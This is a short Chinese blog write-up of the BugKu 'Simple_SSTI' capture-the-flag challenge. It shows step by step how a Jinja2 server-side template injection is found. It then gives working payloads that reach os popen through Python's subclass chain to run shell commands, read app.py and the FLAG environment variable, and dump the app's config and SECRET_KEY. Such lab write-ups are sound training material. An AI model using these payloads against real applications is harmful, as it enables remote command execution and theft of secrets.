【BugKu】Simple_SSTI

Itachi
  2021-12-28 11:09:07 2021-12-28 11:09:07 创建   2021-12-28 14:02:56 2021-12-28 14:02:56 更新      

Simple_SSTI_1

img
猜测GET传参flag:?flag=1
img
测试注入:?flag=${7*7}
img

?flag={{7*7}}
img
?flag={{7*'7'}}
img
所以该模板使用的是jinja2渲染:?flag={{[].__class__.__base__.__subclasses__()}}
img
?flag={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']("ls").read()}}
img
?flag={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']("cat app.py").read()}}
img
?flag={{[].__class__.__base__.__subclasses__()[127].__init__.__globals__['popen']("echo $FLAG").read()}}
img

payload 2

知道这是一个jinjia,可以直接查看配置:?flag={{config}}
img
也可以根据注释:?flag={{config.SECRET_KEY}}
img

  • 标题: 【BugKu】Simple_SSTI
  • 作者: Itachi
  • 创建于 : 2021-12-28 11:09:07
  • 更新于 : 2021-12-28 14:02:56
  • 链接: https://blog.tarchi.top/web/【BugKu】Simple-SSTI/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
 评论
此页目录
【BugKu】Simple_SSTI
  1. Simple_SSTI_1
    1. payload 2